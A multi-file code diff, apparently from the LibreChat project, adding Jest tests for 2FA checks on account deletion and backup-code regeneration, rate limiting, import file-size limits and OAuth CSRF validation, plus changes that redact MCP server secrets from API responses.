totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({
verified: false,
status: 401,
message: 'Invalid token or backup code',
});
await regenerateBackupCodes(req, res);
expect(res.status).toHaveBeenCalledWith(401);
expect(res.json).toHaveBeenCalledWith({ message: 'Invalid token or backup code' });
});
it('includes backupCodesHash in response', async () => {
const req = { user: { id: 'user1' }, body: { token: '123456' } };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
mockUpdateUser.mockResolvedValue({});
await regenerateBackupCodes(req, res);
const responseBody = res.json.mock.calls[0][0];
expect(responseBody).toHaveProperty('backupCodesHash', CODE_OBJECTS);
expect(responseBody).toHaveProperty('backupCodes', PLAIN_CODES);
});
it('allows regeneration without token when 2FA is not enabled', async () => {
const req = { user: { id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: false,
});
mockUpdateUser.mockResolvedValue({});
await regenerateBackupCodes(req, res);
expect(mockVerifyOTPOrBackupCode).not.toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(200);
expect(res.json).toHaveBeenCalledWith({
backupCodes: PLAIN_CODES,
backupCodesHash: CODE_OBJECTS,
});
});
});


@@ -0,0 +1,302 @@
const mockGetUserById = jest.fn();
const mockDeleteMessages = jest.fn();
const mockDeleteAllUserSessions = jest.fn();
const mockDeleteUserById = jest.fn();
const mockDeleteAllSharedLinks = jest.fn();
const mockDeletePresets = jest.fn();
const mockDeleteUserKey = jest.fn();
const mockDeleteConvos = jest.fn();
const mockDeleteFiles = jest.fn();
const mockGetFiles = jest.fn();
const mockUpdateUserPlugins = jest.fn();
const mockUpdateUser = jest.fn();
const mockFindToken = jest.fn();
const mockVerifyOTPOrBackupCode = jest.fn();
const mockDeleteUserPluginAuth = jest.fn();
const mockProcessDeleteRequest = jest.fn();
const mockDeleteToolCalls = jest.fn();
const mockDeleteUserAgents = jest.fn();
const mockDeleteUserPrompts = jest.fn();
jest.mock('@librechat/data-schemas', () => ({
logger: { error: jest.fn(), info: jest.fn() },
webSearchKeys: [],
}));
jest.mock('librechat-data-provider', () => ({
Tools: {},
CacheKeys: {},
Constants: { mcp_delimiter: '::', mcp_prefix: 'mcp_' },
FileSources: {},
}));
jest.mock('@librechat/api', () => ({
MCPOAuthHandler: {},
MCPTokenStorage: {},
normalizeHttpError: jest.fn(),
extractWebSearchEnvVars: jest.fn(),
}));
jest.mock('~/models', () => ({
deleteAllUserSessions: (...args) => mockDeleteAllUserSessions(...args),
deleteAllSharedLinks: (...args) => mockDeleteAllSharedLinks(...args),
updateUserPlugins: (...args) => mockUpdateUserPlugins(...args),
deleteUserById: (...args) => mockDeleteUserById(...args),
deleteMessages: (...args) => mockDeleteMessages(...args),
deletePresets: (...args) => mockDeletePresets(...args),
deleteUserKey: (...args) => mockDeleteUserKey(...args),
getUserById: (...args) => mockGetUserById(...args),
deleteConvos: (...args) => mockDeleteConvos(...args),
deleteFiles: (...args) => mockDeleteFiles(...args),
updateUser: (...args) => mockUpdateUser(...args),
findToken: (...args) => mockFindToken(...args),
getFiles: (...args) => mockGetFiles(...args),
}));
jest.mock('~/db/models', () => ({
ConversationTag: { deleteMany: jest.fn() },
AgentApiKey: { deleteMany: jest.fn() },
Transaction: { deleteMany: jest.fn() },
MemoryEntry: { deleteMany: jest.fn() },
Assistant: { deleteMany: jest.fn() },
AclEntry: { deleteMany: jest.fn() },
Balance: { deleteMany: jest.fn() },
Action: { deleteMany: jest.fn() },
Group: { updateMany: jest.fn() },
Token: { deleteMany: jest.fn() },
User: {},
}));
jest.mock('~/server/services/PluginService', () => ({
updateUserPluginAuth: jest.fn(),
deleteUserPluginAuth: (...args) => mockDeleteUserPluginAuth(...args),
}));
jest.mock('~/server/services/twoFactorService', () => ({
verifyOTPOrBackupCode: (...args) => mockVerifyOTPOrBackupCode(...args),
}));
jest.mock('~/server/services/AuthService', () => ({
verifyEmail: jest.fn(),
resendVerificationEmail: jest.fn(),
}));
jest.mock('~/config', () => ({
getMCPManager: jest.fn(),
getFlowStateManager: jest.fn(),
getMCPServersRegistry: jest.fn(),
}));
jest.mock('~/server/services/Config/getCachedTools', () => ({
invalidateCachedTools: jest.fn(),
}));
jest.mock('~/server/services/Files/S3/crud', () => ({
needsRefresh: jest.fn(),
getNewS3URL: jest.fn(),
}));
jest.mock('~/server/services/Files/process', () => ({
processDeleteRequest: (...args) => mockProcessDeleteRequest(...args),
}));
jest.mock('~/server/services/Config', () => ({
getAppConfig: jest.fn(),
}));
jest.mock('~/models/ToolCall', () => ({
deleteToolCalls: (...args) => mockDeleteToolCalls(...args),
}));
jest.mock('~/models/Prompt', () => ({
deleteUserPrompts: (...args) => mockDeleteUserPrompts(...args),
}));
jest.mock('~/models/Agent', () => ({
deleteUserAgents: (...args) => mockDeleteUserAgents(...args),
}));
jest.mock('~/cache', () => ({
getLogStores: jest.fn(),
}));
const { deleteUserController } = require('~/server/controllers/UserController');
function createRes() {
const res = {};
res.status = jest.fn().mockReturnValue(res);
res.json = jest.fn().mockReturnValue(res);
res.send = jest.fn().mockReturnValue(res);
return res;
}
function stubDeletionMocks() {
mockDeleteMessages.mockResolvedValue();
mockDeleteAllUserSessions.mockResolvedValue();
mockDeleteUserKey.mockResolvedValue();
mockDeletePresets.mockResolvedValue();
mockDeleteConvos.mockResolvedValue();
mockDeleteUserPluginAuth.mockResolvedValue();
mockDeleteUserById.mockResolvedValue();
mockDeleteAllSharedLinks.mockResolvedValue();
mockGetFiles.mockResolvedValue([]);
mockProcessDeleteRequest.mockResolvedValue();
mockDeleteFiles.mockResolvedValue();
mockDeleteToolCalls.mockResolvedValue();
mockDeleteUserAgents.mockResolvedValue();
mockDeleteUserPrompts.mockResolvedValue();
}
beforeEach(() => {
jest.clearAllMocks();
stubDeletionMocks();
});
describe('deleteUserController - 2FA enforcement', () => {
it('proceeds with deletion when 2FA is not enabled', async () => {
const req = { user: { id: 'user1', _id: 'user1', email: 'a@b.com' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({ _id: 'user1', twoFactorEnabled: false });
await deleteUserController(req, res);
expect(res.status).toHaveBeenCalledWith(200);
expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' });
expect(mockDeleteMessages).toHaveBeenCalled();
expect(mockVerifyOTPOrBackupCode).not.toHaveBeenCalled();
});
it('proceeds with deletion when user has no 2FA record', async () => {
const req = { user: { id: 'user1', _id: 'user1', email: 'a@b.com' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue(null);
await deleteUserController(req, res);
expect(res.status).toHaveBeenCalledWith(200);
expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' });
});
it('returns error when 2FA is enabled and verification fails with 400', async () => {
const req = { user: { id: 'user1', _id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: false, status: 400 });
await deleteUserController(req, res);
expect(res.status).toHaveBeenCalledWith(400);
expect(mockDeleteMessages).not.toHaveBeenCalled();
});
it('returns 401 when 2FA is enabled and invalid TOTP token provided', async () => {
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
};
const req = { user: { id: 'user1', _id: 'user1' }, body: { token: 'wrong' } };
const res = createRes();
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({
verified: false,
status: 401,
message: 'Invalid token or backup code',
});
await deleteUserController(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
user: existingUser,
token: 'wrong',
backupCode: undefined,
});
expect(res.status).toHaveBeenCalledWith(401);
expect(res.json).toHaveBeenCalledWith({ message: 'Invalid token or backup code' });
expect(mockDeleteMessages).not.toHaveBeenCalled();
});
it('returns 401 when 2FA is enabled and invalid backup code provided', async () => {
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
backupCodes: [],
};
const req = { user: { id: 'user1', _id: 'user1' }, body: { backupCode: 'bad-code' } };
const res = createRes();
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({
verified: false,
status: 401,
message: 'Invalid token or backup code',
});
await deleteUserController(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
user: existingUser,
token: undefined,
backupCode: 'bad-code',
});
expect(res.status).toHaveBeenCalledWith(401);
expect(mockDeleteMessages).not.toHaveBeenCalled();
});
it('deletes account when valid TOTP token provided with 2FA enabled', async () => {
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
};
const req = {
user: { id: 'user1', _id: 'user1', email: 'a@b.com' },
body: { token: '123456' },
};
const res = createRes();
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
await deleteUserController(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
user: existingUser,
token: '123456',
backupCode: undefined,
});
expect(res.status).toHaveBeenCalledWith(200);
expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' });
expect(mockDeleteMessages).toHaveBeenCalled();
});
it('deletes account when valid backup code provided with 2FA enabled', async () => {
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
backupCodes: [{ codeHash: 'h1', used: false }],
};
const req = {
user: { id: 'user1', _id: 'user1', email: 'a@b.com' },
body: { backupCode: 'valid-code' },
};
const res = createRes();
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
await deleteUserController(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
user: existingUser,
token: undefined,
backupCode: 'valid-code',
});
expect(res.status).toHaveBeenCalledWith(200);
expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' });
expect(mockDeleteMessages).toHaveBeenCalled();
});
});


@@ -1172,7 +1172,11 @@ class AgentClient extends BaseClient {
}
}
/** Anthropic Claude models use a distinct BPE tokenizer; all others default to o200k_base. */
getEncoding() {
if (this.model && this.model.toLowerCase().includes('claude')) {
return 'claude';
}
return 'o200k_base';
}


@@ -7,9 +7,11 @@
 */
const { logger } = require('@librechat/data-schemas');
const {
MCPErrorCodes,
redactServerSecrets,
redactAllServerSecrets,
isMCPDomainNotAllowedError,
isMCPInspectionFailedError,
MCPErrorCodes,
} = require('@librechat/api');
const { Constants, MCPServerUserInputSchema } = require('librechat-data-provider');
const { cacheMCPServerTools, getMCPServerTools } = require('~/server/services/Config');
@@ -181,10 +183,8 @@ const getMCPServersList = async (req, res) => {
return res.status(401).json({ message: 'Unauthorized' });
}
// 2. Get all server configs from registry (YAML + DB)
const serverConfigs = await getMCPServersRegistry().getAllServerConfigs(userId);
return res.json(redactAllServerSecrets(serverConfigs));
return res.json(serverConfigs);
} catch (error) {
logger.error('[getMCPServersList]', error);
res.status(500).json({ error: error.message });
@@ -215,7 +215,7 @@ const createMCPServerController = async (req, res) => {
);
res.status(201).json({
serverName: result.serverName,
...result.config,
...redactServerSecrets(result.config),
});
} catch (error) {
logger.error('[createMCPServer]', error);
@@ -243,7 +243,7 @@ const getMCPServerById = async (req, res) => {
return res.status(404).json({ message: 'MCP server not found' });
}
res.status(200).json(parsedConfig);
res.status(200).json(redactServerSecrets(parsedConfig));
} catch (error) {
logger.error('[getMCPServerById]', error);
res.status(500).json({ message: error.message });
@@ -274,7 +274,7 @@ const updateMCPServerController = async (req, res) => {
userId,
);
res.status(200).json(parsedConfig);
res.status(200).json(redactServerSecrets(parsedConfig));
} catch (error) {
logger.error('[updateMCPServer]', error);
const mcpErrorResponse = handleMCPError(error, res);


@@ -48,7 +48,7 @@ const createForkHandler = (ip = true) => {
};
await logViolation(req, res, type, errorMessage, forkViolationScore);
res.status(429).json({ message: 'Too many conversation fork requests. Try again later' });
res.status(429).json({ message: 'Too many requests. Try again later' });
};
};


@@ -0,0 +1,93 @@
module.exports = {
agents: () => ({ sleep: jest.fn() }),
api: (overrides = {}) => ({
isEnabled: jest.fn(),
resolveImportMaxFileSize: jest.fn(() => 262144000),
createAxiosInstance: jest.fn(() => ({
get: jest.fn(),
post: jest.fn(),
put: jest.fn(),
delete: jest.fn(),
})),
logAxiosError: jest.fn(),
...overrides,
}),
dataSchemas: () => ({
logger: {
debug: jest.fn(),
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
},
createModels: jest.fn(() => ({
User: {},
Conversation: {},
Message: {},
SharedLink: {},
})),
}),
dataProvider: (overrides = {}) => ({
CacheKeys: { GEN_TITLE: 'GEN_TITLE' },
EModelEndpoint: {
azureAssistants: 'azureAssistants',
assistants: 'assistants',
},
...overrides,
}),
conversationModel: () => ({
getConvosByCursor: jest.fn(),
getConvo: jest.fn(),
deleteConvos: jest.fn(),
saveConvo: jest.fn(),
}),
toolCallModel: () => ({ deleteToolCalls: jest.fn() }),
sharedModels: () => ({
deleteAllSharedLinks: jest.fn(),
deleteConvoSharedLink: jest.fn(),
}),
requireJwtAuth: () => (req, res, next) => next(),
middlewarePassthrough: () => ({
createImportLimiters: jest.fn(() => ({
importIpLimiter: (req, res, next) => next(),
importUserLimiter: (req, res, next) => next(),
})),
createForkLimiters: jest.fn(() => ({
forkIpLimiter: (req, res, next) => next(),
forkUserLimiter: (req, res, next) => next(),
})),
configMiddleware: (req, res, next) => next(),
validateConvoAccess: (req, res, next) => next(),
}),
forkUtils: () => ({
forkConversation: jest.fn(),
duplicateConversation: jest.fn(),
}),
importUtils: () => ({ importConversations: jest.fn() }),
logStores: () => jest.fn(),
multerSetup: () => ({
storage: {},
importFileFilter: jest.fn(),
}),
multerLib: () =>
jest.fn(() => ({
single: jest.fn(() => (req, res, next) => {
req.file = { path: '/tmp/test-file.json' };
next();
}),
})),
assistantEndpoint: () => ({ initializeClient: jest.fn() }),
};


@@ -0,0 +1,135 @@
const express = require('express');
const request = require('supertest');
const MOCKS = '../__test-utils__/convos-route-mocks';
jest.mock('@librechat/agents', () => require(MOCKS).agents());
jest.mock('@librechat/api', () => require(MOCKS).api({ limiterCache: jest.fn(() => undefined) }));
jest.mock('@librechat/data-schemas', () => require(MOCKS).dataSchemas());
jest.mock('librechat-data-provider', () =>
require(MOCKS).dataProvider({ ViolationTypes: { FILE_UPLOAD_LIMIT: 'file_upload_limit' } }),
);
jest.mock('~/cache/logViolation', () => jest.fn().mockResolvedValue(undefined));
jest.mock('~/cache/getLogStores', () => require(MOCKS).logStores());
jest.mock('~/models/Conversation', () => require(MOCKS).conversationModel());
jest.mock('~/models/ToolCall', () => require(MOCKS).toolCallModel());
jest.mock('~/models', () => require(MOCKS).sharedModels());
jest.mock('~/server/middleware/requireJwtAuth', () => require(MOCKS).requireJwtAuth());
jest.mock('~/server/middleware', () => {
const { createForkLimiters } = jest.requireActual('~/server/middleware/limiters/forkLimiters');
return {
createImportLimiters: jest.fn(() => ({
importIpLimiter: (req, res, next) => next(),
importUserLimiter: (req, res, next) => next(),
})),
createForkLimiters,
configMiddleware: (req, res, next) => next(),
validateConvoAccess: (req, res, next) => next(),
};
});
jest.mock('~/server/utils/import/fork', () => require(MOCKS).forkUtils());
jest.mock('~/server/utils/import', () => require(MOCKS).importUtils());
jest.mock('~/server/routes/files/multer', () => require(MOCKS).multerSetup());
jest.mock('multer', () => require(MOCKS).multerLib());
jest.mock('~/server/services/Endpoints/azureAssistants', () => require(MOCKS).assistantEndpoint());
jest.mock('~/server/services/Endpoints/assistants', () => require(MOCKS).assistantEndpoint());
describe('POST /api/convos/duplicate - Rate Limiting', () => {
let app;
let duplicateConversation;
const savedEnv = {};
beforeAll(() => {
savedEnv.FORK_USER_MAX = process.env.FORK_USER_MAX;
savedEnv.FORK_USER_WINDOW = process.env.FORK_USER_WINDOW;
savedEnv.FORK_IP_MAX = process.env.FORK_IP_MAX;
savedEnv.FORK_IP_WINDOW = process.env.FORK_IP_WINDOW;
});
afterAll(() => {
for (const key of Object.keys(savedEnv)) {
if (savedEnv[key] === undefined) {
delete process.env[key];
} else {
process.env[key] = savedEnv[key];
}
}
});
const setupApp = () => {
jest.clearAllMocks();
jest.isolateModules(() => {
const convosRouter = require('../convos');
({ duplicateConversation } = require('~/server/utils/import/fork'));
app = express();
app.use(express.json());
app.use((req, res, next) => {
req.user = { id: 'rate-limit-test-user' };
next();
});
app.use('/api/convos', convosRouter);
});
duplicateConversation.mockResolvedValue({
conversation: { conversationId: 'duplicated-conv' },
});
};
describe('user limit', () => {
beforeEach(() => {
process.env.FORK_USER_MAX = '2';
process.env.FORK_USER_WINDOW = '1';
process.env.FORK_IP_MAX = '100';
process.env.FORK_IP_WINDOW = '1';
setupApp();
});
it('should return 429 after exceeding the user rate limit', async () => {
const userMax = parseInt(process.env.FORK_USER_MAX, 10);
for (let i = 0; i < userMax; i++) {
const res = await request(app)
.post('/api/convos/duplicate')
.send({ conversationId: 'conv-123' });
expect(res.status).toBe(201);
}
const res = await request(app)
.post('/api/convos/duplicate')
.send({ conversationId: 'conv-123' });
expect(res.status).toBe(429);
expect(res.body.message).toMatch(/too many/i);
});
});
describe('IP limit', () => {
beforeEach(() => {
process.env.FORK_USER_MAX = '100';
process.env.FORK_USER_WINDOW = '1';
process.env.FORK_IP_MAX = '2';
process.env.FORK_IP_WINDOW = '1';
setupApp();
});
it('should return 429 after exceeding the IP rate limit', async () => {
const ipMax = parseInt(process.env.FORK_IP_MAX, 10);
for (let i = 0; i < ipMax; i++) {
const res = await request(app)
.post('/api/convos/duplicate')
.send({ conversationId: 'conv-123' });
expect(res.status).toBe(201);
}
const res = await request(app)
.post('/api/convos/duplicate')
.send({ conversationId: 'conv-123' });
expect(res.status).toBe(429);
expect(res.body.message).toMatch(/too many/i);
});
});
});


@@ -0,0 +1,98 @@
const express = require('express');
const request = require('supertest');
const multer = require('multer');
const importFileFilter = (req, file, cb) => {
if (file.mimetype === 'application/json') {
cb(null, true);
} else {
cb(new Error('Only JSON files are allowed'), false);
}
};
/** Proxy app that mirrors the production multer + error-handling pattern */
function createImportApp(fileSize) {
const app = express();
const upload = multer({
storage: multer.memoryStorage(),
fileFilter: importFileFilter,
limits: { fileSize },
});
const uploadSingle = upload.single('file');
function handleUpload(req, res, next) {
uploadSingle(req, res, (err) => {
if (err && err.code === 'LIMIT_FILE_SIZE') {
return res.status(413).json({ message: 'File exceeds the maximum allowed size' });
}
if (err) {
return next(err);
}
next();
});
}
app.post('/import', handleUpload, (req, res) => {
res.status(201).json({ message: 'success', size: req.file.size });
});
app.use((err, _req, res, _next) => {
res.status(400).json({ error: err.message });
});
return app;
}
describe('Conversation Import - Multer File Size Limits', () => {
describe('multer rejects files exceeding the configured limit', () => {
it('returns 413 for files larger than the limit', async () => {
const limit = 1024;
const app = createImportApp(limit);
const oversized = Buffer.alloc(limit + 512, 'x');
const res = await request(app)
.post('/import')
.attach('file', oversized, { filename: 'import.json', contentType: 'application/json' });
expect(res.status).toBe(413);
expect(res.body.message).toBe('File exceeds the maximum allowed size');
});
it('accepts files within the limit', async () => {
const limit = 4096;
const app = createImportApp(limit);
const valid = Buffer.from(JSON.stringify({ title: 'test' }));
const res = await request(app)
.post('/import')
.attach('file', valid, { filename: 'import.json', contentType: 'application/json' });
expect(res.status).toBe(201);
expect(res.body.message).toBe('success');
});
it('rejects at the exact boundary (limit + 1 byte)', async () => {
const limit = 512;
const app = createImportApp(limit);
const boundary = Buffer.alloc(limit + 1, 'a');
const res = await request(app)
.post('/import')
.attach('file', boundary, { filename: 'import.json', contentType: 'application/json' });
expect(res.status).toBe(413);
});
it('accepts a file just under the limit', async () => {
const limit = 512;
const app = createImportApp(limit);
const underLimit = Buffer.alloc(limit - 1, 'b');
const res = await request(app)
.post('/import')
.attach('file', underLimit, { filename: 'import.json', contentType: 'application/json' });
expect(res.status).toBe(201);
});
});
});


@@ -1,109 +1,24 @@
const express = require('express'); const express = require('express');
const request = require('supertest'); const request = require('supertest');
jest.mock('@librechat/agents', () => ({ const MOCKS = '../__test-utils__/convos-route-mocks';
sleep: jest.fn(),
}));
jest.mock('@librechat/api', () => ({ jest.mock('@librechat/agents', () => require(MOCKS).agents());
isEnabled: jest.fn(), jest.mock('@librechat/api', () => require(MOCKS).api());
createAxiosInstance: jest.fn(() => ({ jest.mock('@librechat/data-schemas', () => require(MOCKS).dataSchemas());
get: jest.fn(), jest.mock('librechat-data-provider', () => require(MOCKS).dataProvider());
post: jest.fn(), jest.mock('~/models/Conversation', () => require(MOCKS).conversationModel());
put: jest.fn(), jest.mock('~/models/ToolCall', () => require(MOCKS).toolCallModel());
delete: jest.fn(), jest.mock('~/models', () => require(MOCKS).sharedModels());
})), jest.mock('~/server/middleware/requireJwtAuth', () => require(MOCKS).requireJwtAuth());
logAxiosError: jest.fn(), jest.mock('~/server/middleware', () => require(MOCKS).middlewarePassthrough());
})); jest.mock('~/server/utils/import/fork', () => require(MOCKS).forkUtils());
jest.mock('~/server/utils/import', () => require(MOCKS).importUtils());
jest.mock('@librechat/data-schemas', () => ({ jest.mock('~/cache/getLogStores', () => require(MOCKS).logStores());
logger: { jest.mock('~/server/routes/files/multer', () => require(MOCKS).multerSetup());
debug: jest.fn(), jest.mock('multer', () => require(MOCKS).multerLib());
info: jest.fn(), jest.mock('~/server/services/Endpoints/azureAssistants', () => require(MOCKS).assistantEndpoint());
warn: jest.fn(), jest.mock('~/server/services/Endpoints/assistants', () => require(MOCKS).assistantEndpoint());
error: jest.fn(),
},
createModels: jest.fn(() => ({
User: {},
Conversation: {},
Message: {},
SharedLink: {},
})),
}));
jest.mock('~/models/Conversation', () => ({
getConvosByCursor: jest.fn(),
getConvo: jest.fn(),
deleteConvos: jest.fn(),
saveConvo: jest.fn(),
}));
jest.mock('~/models/ToolCall', () => ({
deleteToolCalls: jest.fn(),
}));
jest.mock('~/models', () => ({
deleteAllSharedLinks: jest.fn(),
deleteConvoSharedLink: jest.fn(),
}));
jest.mock('~/server/middleware/requireJwtAuth', () => (req, res, next) => next());
jest.mock('~/server/middleware', () => ({
createImportLimiters: jest.fn(() => ({
importIpLimiter: (req, res, next) => next(),
importUserLimiter: (req, res, next) => next(),
})),
createForkLimiters: jest.fn(() => ({
forkIpLimiter: (req, res, next) => next(),
forkUserLimiter: (req, res, next) => next(),
})),
configMiddleware: (req, res, next) => next(),
validateConvoAccess: (req, res, next) => next(),
}));
jest.mock('~/server/utils/import/fork', () => ({
forkConversation: jest.fn(),
duplicateConversation: jest.fn(),
}));
jest.mock('~/server/utils/import', () => ({
importConversations: jest.fn(),
}));
jest.mock('~/cache/getLogStores', () => jest.fn());
jest.mock('~/server/routes/files/multer', () => ({
storage: {},
importFileFilter: jest.fn(),
}));
jest.mock('multer', () => {
return jest.fn(() => ({
single: jest.fn(() => (req, res, next) => {
req.file = { path: '/tmp/test-file.json' };
next();
}),
}));
});
jest.mock('librechat-data-provider', () => ({
CacheKeys: {
GEN_TITLE: 'GEN_TITLE',
},
EModelEndpoint: {
azureAssistants: 'azureAssistants',
assistants: 'assistants',
},
}));
jest.mock('~/server/services/Endpoints/azureAssistants', () => ({
initializeClient: jest.fn(),
}));
jest.mock('~/server/services/Endpoints/assistants', () => ({
initializeClient: jest.fn(),
}));
describe('Convos Routes', () => {
let app;


@ -32,6 +32,9 @@ jest.mock('@librechat/api', () => {
getFlowState: jest.fn(),
completeOAuthFlow: jest.fn(),
generateFlowId: jest.fn(),
resolveStateToFlowId: jest.fn(async (state) => state),
storeStateMapping: jest.fn(),
deleteStateMapping: jest.fn(),
},
MCPTokenStorage: {
storeTokens: jest.fn(),
@ -180,7 +183,10 @@ describe('MCP Routes', () => {
MCPOAuthHandler.initiateOAuthFlow.mockResolvedValue({
authorizationUrl: 'https://oauth.example.com/auth',
flowId: 'test-user-id:test-server',
flowMetadata: { state: 'random-state-value' },
});
MCPOAuthHandler.storeStateMapping.mockResolvedValue();
mockFlowManager.initFlow = jest.fn().mockResolvedValue();
const response = await request(app).get('/api/mcp/test-server/oauth/initiate').query({
userId: 'test-user-id', userId: 'test-user-id',
@ -367,6 +373,121 @@ describe('MCP Routes', () => {
expect(response.headers.location).toBe(`${basePath}/oauth/error?error=invalid_state`);
});
describe('CSRF fallback via active PENDING flow', () => {
it('should proceed when a fresh PENDING flow exists and no cookies are present', async () => {
const flowId = 'test-user-id:test-server';
const mockFlowManager = {
getFlowState: jest.fn().mockResolvedValue({
status: 'PENDING',
createdAt: Date.now(),
}),
completeFlow: jest.fn().mockResolvedValue(true),
deleteFlow: jest.fn().mockResolvedValue(true),
};
const mockFlowState = {
serverName: 'test-server',
userId: 'test-user-id',
metadata: {},
clientInfo: {},
codeVerifier: 'test-verifier',
};
getLogStores.mockReturnValue({});
require('~/config').getFlowStateManager.mockReturnValue(mockFlowManager);
MCPOAuthHandler.getFlowState.mockResolvedValue(mockFlowState);
MCPOAuthHandler.completeOAuthFlow.mockResolvedValue({
access_token: 'test-token',
});
MCPTokenStorage.storeTokens.mockResolvedValue();
mockRegistryInstance.getServerConfig.mockResolvedValue({});
const mockMcpManager = {
getUserConnection: jest.fn().mockResolvedValue({
fetchTools: jest.fn().mockResolvedValue([]),
}),
};
require('~/config').getMCPManager.mockReturnValue(mockMcpManager);
require('~/config').getOAuthReconnectionManager.mockReturnValue({
clearReconnection: jest.fn(),
});
require('~/server/services/Config/mcp').updateMCPServerTools.mockResolvedValue();
const response = await request(app)
.get('/api/mcp/test-server/oauth/callback')
.query({ code: 'test-code', state: flowId });
const basePath = getBasePath();
expect(response.status).toBe(302);
expect(response.headers.location).toContain(`${basePath}/oauth/success`);
});
it('should reject when no PENDING flow exists and no cookies are present', async () => {
const flowId = 'test-user-id:test-server';
const mockFlowManager = {
getFlowState: jest.fn().mockResolvedValue(null),
};
getLogStores.mockReturnValue({});
require('~/config').getFlowStateManager.mockReturnValue(mockFlowManager);
const response = await request(app)
.get('/api/mcp/test-server/oauth/callback')
.query({ code: 'test-code', state: flowId });
const basePath = getBasePath();
expect(response.status).toBe(302);
expect(response.headers.location).toBe(
`${basePath}/oauth/error?error=csrf_validation_failed`,
);
});
it('should reject when only a COMPLETED flow exists (not PENDING)', async () => {
const flowId = 'test-user-id:test-server';
const mockFlowManager = {
getFlowState: jest.fn().mockResolvedValue({
status: 'COMPLETED',
createdAt: Date.now(),
}),
};
getLogStores.mockReturnValue({});
require('~/config').getFlowStateManager.mockReturnValue(mockFlowManager);
const response = await request(app)
.get('/api/mcp/test-server/oauth/callback')
.query({ code: 'test-code', state: flowId });
const basePath = getBasePath();
expect(response.status).toBe(302);
expect(response.headers.location).toBe(
`${basePath}/oauth/error?error=csrf_validation_failed`,
);
});
it('should reject when PENDING flow is stale (older than PENDING_STALE_MS)', async () => {
const flowId = 'test-user-id:test-server';
const mockFlowManager = {
getFlowState: jest.fn().mockResolvedValue({
status: 'PENDING',
createdAt: Date.now() - 3 * 60 * 1000,
}),
};
getLogStores.mockReturnValue({});
require('~/config').getFlowStateManager.mockReturnValue(mockFlowManager);
const response = await request(app)
.get('/api/mcp/test-server/oauth/callback')
.query({ code: 'test-code', state: flowId });
const basePath = getBasePath();
expect(response.status).toBe(302);
expect(response.headers.location).toBe(
`${basePath}/oauth/error?error=csrf_validation_failed`,
);
});
});
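The four CSRF-fallback cases above reduce to one freshness predicate over the stored flow state. A minimal sketch of that predicate, assuming a two-minute `PENDING_STALE_MS` window (the constant's actual name and value live in the route handler and may differ; the tests only establish that a three-minute-old PENDING flow counts as stale):

```javascript
// Sketch of the freshness check the tests above imply; PENDING_STALE_MS
// is an assumed value, not LibreChat's actual constant.
const PENDING_STALE_MS = 2 * 60 * 1000;

function isActivePendingFlow(flowState, now = Date.now()) {
  if (!flowState) return false; // no flow recorded for this state -> reject
  if (flowState.status !== 'PENDING') return false; // COMPLETED/FAILED -> reject
  return now - flowState.createdAt <= PENDING_STALE_MS; // stale PENDING -> reject
}

console.log(isActivePendingFlow({ status: 'PENDING', createdAt: Date.now() })); // true
console.log(isActivePendingFlow(null)); // false
console.log(isActivePendingFlow({ status: 'COMPLETED', createdAt: Date.now() })); // false
console.log(isActivePendingFlow({ status: 'PENDING', createdAt: Date.now() - 3 * 60 * 1000 })); // false
```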
it('should handle OAuth callback successfully', async () => {
// mockRegistryInstance is defined at the top of the file
const mockFlowManager = {
@ -1572,12 +1693,14 @@ describe('MCP Routes', () => {
it('should return all server configs for authenticated user', async () => {
const mockServerConfigs = {
'server-1': {
type: 'sse',
url: 'http://server1.com/sse',
title: 'Server 1',
},
'server-2': {
type: 'sse',
url: 'http://server2.com/sse',
title: 'Server 2',
},
};
@ -1586,7 +1709,18 @@ describe('MCP Routes', () => {
const response = await request(app).get('/api/mcp/servers');
expect(response.status).toBe(200);
expect(response.body['server-1']).toMatchObject({
type: 'sse',
url: 'http://server1.com/sse',
title: 'Server 1',
});
expect(response.body['server-2']).toMatchObject({
type: 'sse',
url: 'http://server2.com/sse',
title: 'Server 2',
});
expect(response.body['server-1'].headers).toBeUndefined();
expect(response.body['server-2'].headers).toBeUndefined();
expect(mockRegistryInstance.getAllServerConfigs).toHaveBeenCalledWith('test-user-id');
});
@ -1641,10 +1775,10 @@ describe('MCP Routes', () => {
const response = await request(app).post('/api/mcp/servers').send({ config: validConfig });
expect(response.status).toBe(201);
expect(response.body.serverName).toBe('test-sse-server');
expect(response.body.type).toBe('sse');
expect(response.body.url).toBe('https://mcp-server.example.com/sse');
expect(response.body.title).toBe('Test SSE Server');
expect(mockRegistryInstance.addServer).toHaveBeenCalledWith(
